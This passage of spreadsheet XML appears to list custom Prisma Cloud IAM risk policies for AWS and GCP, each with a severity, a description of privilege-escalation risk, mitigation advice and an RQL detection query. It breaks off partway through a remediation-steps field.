      <c r="T3043" t="b">
        <v>0</v>
      </c>
      <c r="U3043" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3043" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3043" t="inlineStr">
        <is>
          <t>This policy identifies IAM write permissions that are defined as risky permissions. Ensure that the AWS EC2 instances provisioned in your AWS account don't have a risky set of write permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3043"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043" t="inlineStr"/>
      <c r="Z3043"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'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3043" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3043" t="inlineStr">
        <is>
          <t>2024-09-13 16:56:54</t>
        </is>
      </c>
      <c r="AC3043" t="inlineStr"/>
      <c r="AD3043" t="b">
        <v>0</v>
      </c>
      <c r="AE3043" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3043" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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43" t="inlineStr">
        <is>
          <t>5e43ff6d-94c2-48c5-b222-172e60e3c793</t>
        </is>
      </c>
      <c r="AI3043" t="inlineStr">
        <is>
          <t>8bef368e-7b79-4828-a9cd-f4aa4fa8a3ce</t>
        </is>
      </c>
      <c r="AJ3043" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3043" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3044">
      <c r="A3044" t="inlineStr"/>
      <c r="B3044" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3044" s="2" t="inlineStr"/>
      <c r="D3044" t="inlineStr"/>
      <c r="E3044" t="inlineStr"/>
      <c r="F3044" t="inlineStr"/>
      <c r="G3044" t="b">
        <v>0</v>
      </c>
      <c r="H30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fricieri-teste-ciem-rule, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3044" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3044" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3044" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with Administrative Permissions - teste</t>
        </is>
      </c>
      <c r="L3044" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3044" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3044" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3044" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3044" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3044" t="inlineStr"/>
      <c r="R3044" t="inlineStr"/>
      <c r="S3044" t="inlineStr"/>
      <c r="T3044" t="b">
        <v>0</v>
      </c>
      <c r="U3044" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3044" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3044" t="inlineStr">
        <is>
          <t>This policy identifies AWS Users and Machine Identities with Administrative Permissions.
Risk of Administrative Permissions:
IAM users and machine identities with active administrative privileges (elevated permissions) pose a significant security risk because:
Unsecured "Root Keys": These accounts act like misplaced root keys. If compromised, attackers can exploit them to gain complete control over your AWS environment. They can create, modify, or delete any resource, potentially leading to severe disruption, data breaches, or financial losses.
Escalation of Privilege: Administrative permissions often grant the ability to elevate privileges of other accounts, potentially granting attackers access to even more sensitive resources and systems.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Avoid creating users or machine identities with administrative privileges unless absolutely necessary.
MFA for Administrative Users: Enforce Multi-Factor Authentication (MFA) for all IAM users with administrative privileges. MFA adds an extra layer of security and makes it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Use Temporary Credentials: Consider using temporary credentials with limited lifespans and permissions for tasks requiring administrative access. This approach minimizes the window of opportunity for attackers if they compromise a credential.
Assume Role for Restricted Access: Utilize the "Assume Role" functionality to grant temporary administrative access to specific resources for users with lower privileges. This approach minimizes the need for permanent administrative accounts.
Regular Review and Auditing: Regularly review IAM user and machine identity permissions, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging privileged users or machine identities. This vigilance can help detect unusual activity related to these accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3044"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044" t="inlineStr"/>
      <c r="Z3044" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.isadministrative = true and grantedby.cloud.entity.name DOES NOT START WITH 'serverlessrepo-OWASP-DVSA'</t>
        </is>
      </c>
      <c r="AA3044" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3044" t="inlineStr">
        <is>
          <t>2024-09-13 16:50:05</t>
        </is>
      </c>
      <c r="AC3044" t="inlineStr"/>
      <c r="AD3044" t="b">
        <v>0</v>
      </c>
      <c r="AE3044" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3044" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>2f5175e4-1947-42bb-bd36-c0cd8bd8870f</t>
        </is>
      </c>
      <c r="AI3044" t="inlineStr">
        <is>
          <t>608d5295-fa94-4fd2-83f7-df2d337f01bb</t>
        </is>
      </c>
      <c r="AJ3044" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3044" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3045">
      <c r="A3045" t="inlineStr"/>
      <c r="B3045" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3045" s="2" t="inlineStr"/>
      <c r="D3045" t="inlineStr"/>
      <c r="E3045" t="inlineStr"/>
      <c r="F3045" t="inlineStr"/>
      <c r="G3045" t="b">
        <v>1</v>
      </c>
      <c r="H30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45" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3045" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3045" t="inlineStr">
        <is>
          <t>iam aws data read test</t>
        </is>
      </c>
      <c r="L3045" t="inlineStr"/>
      <c r="M3045" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3045" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3045" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3045" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3045" t="inlineStr"/>
      <c r="R3045" t="inlineStr"/>
      <c r="S3045" t="inlineStr"/>
      <c r="T3045" t="b">
        <v>0</v>
      </c>
      <c r="U3045" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3045" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3045" t="inlineStr"/>
      <c r="X3045" t="inlineStr"/>
      <c r="Y3045" t="inlineStr"/>
      <c r="Z3045" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'aws' and action.access.level = 'Data Read'</t>
        </is>
      </c>
      <c r="AA3045" t="inlineStr">
        <is>
          <t>Jason Dempsey</t>
        </is>
      </c>
      <c r="AB3045" t="inlineStr">
        <is>
          <t>2024-10-15 20:19:55</t>
        </is>
      </c>
      <c r="AC3045" t="inlineStr"/>
      <c r="AD3045" t="b">
        <v>0</v>
      </c>
      <c r="AE3045" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3045" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>4780ed4c-b9ca-46e4-a78b-18bfbca93e54</t>
        </is>
      </c>
      <c r="AI3045" t="inlineStr">
        <is>
          <t>8aafb7c0-2d48-41d8-8a08-2776fca867dd</t>
        </is>
      </c>
      <c r="AJ3045" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3045" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3046">
      <c r="A3046" t="inlineStr"/>
      <c r="B3046" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3046" s="2" t="inlineStr"/>
      <c r="D3046" t="inlineStr"/>
      <c r="E3046" t="inlineStr"/>
      <c r="F3046" t="inlineStr"/>
      <c r="G3046" t="b">
        <v>1</v>
      </c>
      <c r="H30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46" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3046" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3046" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned Resource Manager Permissions Which Could Lead to Privilege Escalation - Cloned via Automation</t>
        </is>
      </c>
      <c r="L3046" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3046" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3046" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3046" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3046" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3046" t="inlineStr"/>
      <c r="R3046" t="inlineStr"/>
      <c r="S3046" t="inlineStr"/>
      <c r="T3046" t="b">
        <v>0</v>
      </c>
      <c r="U3046" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3046" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3046" t="inlineStr">
        <is>
          <t>An adversary able to edit IAM Policies at the organization, folder or project levels could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3046"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46" t="inlineStr"/>
      <c r="Z3046" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name IN ('resourcemanager.organizations.setIamPolicy', 'resourcemanager.folders.setIamPolicy', 'resourcemanager.projects.setIamPolicy')</t>
        </is>
      </c>
      <c r="AA3046" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3046" t="inlineStr">
        <is>
          <t>2024-11-12 19:42:34</t>
        </is>
      </c>
      <c r="AC3046" t="inlineStr"/>
      <c r="AD3046" t="b">
        <v>0</v>
      </c>
      <c r="AE3046" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3046" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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6" t="inlineStr">
        <is>
          <t>718dfa63-3465-47fd-af85-e6b5a0da1124</t>
        </is>
      </c>
      <c r="AI3046" t="inlineStr">
        <is>
          <t>ab9e5269-5014-48e6-b293-a318100aa535</t>
        </is>
      </c>
      <c r="AJ3046" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3046" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3047">
      <c r="A3047" t="inlineStr"/>
      <c r="B3047" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3047" s="2" t="inlineStr"/>
      <c r="D3047" t="inlineStr"/>
      <c r="E3047" t="inlineStr"/>
      <c r="F3047" t="inlineStr"/>
      <c r="G3047" t="b">
        <v>0</v>
      </c>
      <c r="H30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47" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3047" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3047" t="inlineStr">
        <is>
          <t>userdirectpermission</t>
        </is>
      </c>
      <c r="L3047" t="inlineStr"/>
      <c r="M3047" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3047" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3047" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3047" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3047" t="inlineStr"/>
      <c r="R3047" t="inlineStr"/>
      <c r="S3047" t="inlineStr"/>
      <c r="T3047" t="b">
        <v>0</v>
      </c>
      <c r="U3047" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3047" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3047" t="inlineStr"/>
      <c r="X3047"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47" t="inlineStr"/>
      <c r="Z3047" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and source.cloud.resource.type = 'user' and grantedby.cloud.entity.type != 'group'</t>
        </is>
      </c>
      <c r="AA3047" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3047" t="inlineStr">
        <is>
          <t>2024-11-12 19:10:58</t>
        </is>
      </c>
      <c r="AC3047" t="inlineStr"/>
      <c r="AD3047" t="b">
        <v>0</v>
      </c>
      <c r="AE3047" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3047" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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47" t="inlineStr">
        <is>
          <t>5f09e253-3931-4b1a-b1d8-2c659d673d14</t>
        </is>
      </c>
      <c r="AI3047" t="inlineStr">
        <is>
          <t>d3cb3d59-4c2e-44b5-a5f4-6a45325ce4c5</t>
        </is>
      </c>
      <c r="AJ3047" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3047" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3048">
      <c r="A3048" t="inlineStr"/>
      <c r="B3048" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3048" s="2" t="inlineStr"/>
      <c r="D3048" t="inlineStr"/>
      <c r="E3048" t="inlineStr"/>
      <c r="F3048" t="inlineStr"/>
      <c r="G3048" t="b">
        <v>1</v>
      </c>
      <c r="H30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fricieri-teste-ciem-rule, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3048" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3048" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3048" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with Administrative Permissions-Fricieri-teste</t>
        </is>
      </c>
      <c r="L3048" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3048" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3048" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3048" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3048" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3048" t="inlineStr"/>
      <c r="R3048" t="inlineStr"/>
      <c r="S3048" t="inlineStr">
        <is>
          <t>fricieri</t>
        </is>
      </c>
      <c r="T3048" t="b">
        <v>0</v>
      </c>
      <c r="U3048" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3048" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3048" t="inlineStr">
        <is>
          <t>This policy identifies GCP Users and Service Accounts with IAM Administrative Permissions.
Risk of Administrative Permissions:
GCP Users and Service Accounts with active IAM administrative permissions (elevated permissions) pose a significant security risk because:
Unfettered Access: These identities hold the "master keys" within your GCP environment. If compromised, attackers can leverage them to perform any action, including creating, modifying, or deleting critical resources. This could lead to data breaches, service disruptions, or substantial financial losses.
Privilege Escalation Potential: Some administrative permissions allow for elevating privileges of other identities. This opens the door for attackers to gain access to even more sensitive resources and systems within your GCP project.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Avoid creating users or service accounts with administrative permissions unless absolutely necessary. Grant only the minimum set of permissions required for each to fulfill their specific tasks.
Multi-Factor Authentication (MFA): Enforce MFA for all GCP Users with administrative permissions. MFA adds an extra layer of security and makes it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Service Account Keys: For service accounts, manage and rotate service account keys securely. Avoid storing keys in long-lived locations or embedding them directly in code. Consider using short-lived credentials or Google Cloud Key Management Service (KMS) for access control.
Restrict User Login: For increased security, consider restricting user login to specific IP addresses or regions using Security Command Center (SCC) or IAM conditions. This can help mitigate the risk of unauthorized access attempts.
GCP IAM Recommender: Utilize GCP IAM Recommender to identify and flag underused or overly permissive IAM policies associated with users and service accounts. This proactive approach helps ensure appropriate access control.
Monitor for Suspicious Activity: Utilize Stackdriver Logging to track activity logs, including actions performed by users and service accounts with administrative permissions. This vigilance can help detect unusual activity related to these entities that might indicate a compromise.
Regular Review and Auditing: Regularly review GCP user access controls and service account permissions, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.</t>
        </is>
      </c>
      <c r="X3048"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048" t="inlineStr"/>
      <c r="Z3048" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3048" t="inlineStr">
        <is>
          <t>Felipe Ricieri</t>
        </is>
      </c>
      <c r="AB3048" t="inlineStr">
        <is>
          <t>2024-11-06 14:08:28</t>
        </is>
      </c>
      <c r="AC3048" t="inlineStr"/>
      <c r="AD3048" t="b">
        <v>0</v>
      </c>
      <c r="AE3048" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3048" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>0633a18b-111e-4396-837d-6621faa513cb</t>
        </is>
      </c>
      <c r="AI3048" t="inlineStr">
        <is>
          <t>4a40b54f-e931-4ff9-ab7f-3bd2ab61776e</t>
        </is>
      </c>
      <c r="AJ3048" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3048" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3049">
      <c r="A3049" t="inlineStr"/>
      <c r="B3049" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3049" s="2" t="inlineStr"/>
      <c r="D3049" t="inlineStr"/>
      <c r="E3049" t="inlineStr"/>
      <c r="F3049" t="inlineStr"/>
      <c r="G3049" t="b">
        <v>1</v>
      </c>
      <c r="H304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fricieri-teste-ciem-rule, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3049" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3049" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3049" t="inlineStr">
        <is>
          <t>GCP IAM effective permissions are over-privileged (7 days)-fricieri</t>
        </is>
      </c>
      <c r="L3049" t="inlineStr">
        <is>
          <t>UNUSED_PRIVILEGES</t>
        </is>
      </c>
      <c r="M3049" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3049" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3049" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3049" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3049" t="inlineStr"/>
      <c r="R3049" t="inlineStr"/>
      <c r="S3049" t="inlineStr">
        <is>
          <t>fricieri</t>
        </is>
      </c>
      <c r="T3049" t="b">
        <v>0</v>
      </c>
      <c r="U3049" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3049" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3049" t="inlineStr">
        <is>
          <t>This policy identifies GCP IAM permissions that are over-privileged. As a security best practice, it is recommended to grant the least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X3049"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49" t="inlineStr"/>
      <c r="Z3049" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' and action.lastaccess.days &gt; 7</t>
        </is>
      </c>
      <c r="AA3049" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3049" t="inlineStr">
        <is>
          <t>2024-11-12 18:57:13</t>
        </is>
      </c>
      <c r="AC3049" t="inlineStr"/>
      <c r="AD3049" t="b">
        <v>0</v>
      </c>
      <c r="AE3049" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3049" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG304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49" t="inlineStr">
        <is>
          <t>d6af8db1-54a2-4d3b-abde-101a072ddcd1</t>
        </is>
      </c>
      <c r="AI3049" t="inlineStr">
        <is>
          <t>ca4807f0-2fb8-4af5-949a-bd677b1501cf</t>
        </is>
      </c>
      <c r="AJ3049" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3049" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3050">
      <c r="A3050" t="inlineStr"/>
      <c r="B3050" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3050" s="2" t="inlineStr"/>
      <c r="D3050" t="inlineStr"/>
      <c r="E3050" t="inlineStr"/>
      <c r="F3050" t="inlineStr"/>
      <c r="G3050" t="b">
        <v>0</v>
      </c>
      <c r="H30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50" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3050" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3050" t="inlineStr">
        <is>
          <t>policy-vstoyko-gcp-aim-00</t>
        </is>
      </c>
      <c r="L3050" t="inlineStr"/>
      <c r="M3050" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3050" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3050" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3050" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3050" t="inlineStr"/>
      <c r="R3050" t="inlineStr"/>
      <c r="S3050" t="inlineStr">
        <is>
          <t>NW Test2</t>
        </is>
      </c>
      <c r="T3050" t="b">
        <v>0</v>
      </c>
      <c r="U3050" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3050" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3050" t="inlineStr">
        <is>
          <t>all gcp users that were assigned roles directly</t>
        </is>
      </c>
      <c r="X3050" t="inlineStr"/>
      <c r="Y3050" t="inlineStr"/>
      <c r="Z3050" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type = 'user' AND grantedby.cloud.entity.type != 'group'</t>
        </is>
      </c>
      <c r="AA3050" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3050" t="inlineStr">
        <is>
          <t>2024-09-13 16:57:00</t>
        </is>
      </c>
      <c r="AC3050" t="inlineStr"/>
      <c r="AD3050" t="b">
        <v>0</v>
      </c>
      <c r="AE3050" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3050" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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50" t="inlineStr">
        <is>
          <t>3e738d97-93b4-4325-8c13-2647e811d4f1</t>
        </is>
      </c>
      <c r="AI3050" t="inlineStr">
        <is>
          <t>859e88c4-2819-4603-a5c6-16ed22f303fd</t>
        </is>
      </c>
      <c r="AJ3050" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3050" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3051">
      <c r="A3051" t="inlineStr"/>
      <c r="B3051" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3051" s="2" t="inlineStr"/>
      <c r="D3051" t="inlineStr"/>
      <c r="E3051" t="inlineStr"/>
      <c r="F3051" t="inlineStr"/>
      <c r="G3051" t="b">
        <v>0</v>
      </c>
      <c r="H30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3051" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3051" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3051" t="inlineStr">
        <is>
          <t>teste</t>
        </is>
      </c>
      <c r="L3051" t="inlineStr"/>
      <c r="M3051" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3051" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3051" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3051" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3051" t="inlineStr"/>
      <c r="R3051" t="inlineStr"/>
      <c r="S3051" t="inlineStr"/>
      <c r="T3051" t="b">
        <v>0</v>
      </c>
      <c r="U3051" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3051" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3051" t="inlineStr"/>
      <c r="X3051"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51" t="inlineStr"/>
      <c r="Z3051" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND action.name contains all('run.services.setIamPolicy', 'iam.serviceAccounts.actAs') AND grantedby.cloud.policy.type != 'GCP Basic Role'</t>
        </is>
      </c>
      <c r="AA3051" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3051" t="inlineStr">
        <is>
          <t>2024-11-12 19:42:35</t>
        </is>
      </c>
      <c r="AC3051" t="inlineStr"/>
      <c r="AD3051" t="b">
        <v>0</v>
      </c>
      <c r="AE3051" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3051" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>8ca8b654-da8c-4472-a393-54e92e0c02df</t>
        </is>
      </c>
      <c r="AI3051" t="inlineStr">
        <is>
          <t>8783eae9-6ef2-493a-ba92-104e33504976</t>
        </is>
      </c>
      <c r="AJ3051" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3051" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3052">
      <c r="A3052" t="inlineStr"/>
      <c r="B3052" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3052" s="2" t="inlineStr"/>
      <c r="D3052" t="inlineStr"/>
      <c r="E3052" t="inlineStr"/>
      <c r="F3052" t="inlineStr"/>
      <c r="G3052" t="b">
        <v>1</v>
      </c>
      <c r="H305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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3052" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3052" t="inlineStr">
        <is>
          <t>Tag Rehan : GCP users with 'Editor' role on org level</t>
        </is>
      </c>
      <c r="L3052" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3052" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3052" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3052" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3052" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3052" t="inlineStr"/>
      <c r="R3052" t="inlineStr"/>
      <c r="S3052" t="inlineStr"/>
      <c r="T3052" t="b">
        <v>0</v>
      </c>
      <c r="U3052" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3052" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3052" t="inlineStr">
        <is>
          <t>This policy identifies GCP basic role 'Editor' on organization level that is defined as risky role. Ensure that the users in your GCP environment don't have a risky 'Editor' role to minimize security risks.</t>
        </is>
      </c>
      <c r="X3052" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Log in to the GCP console
 2. Navigate to the relevant organization
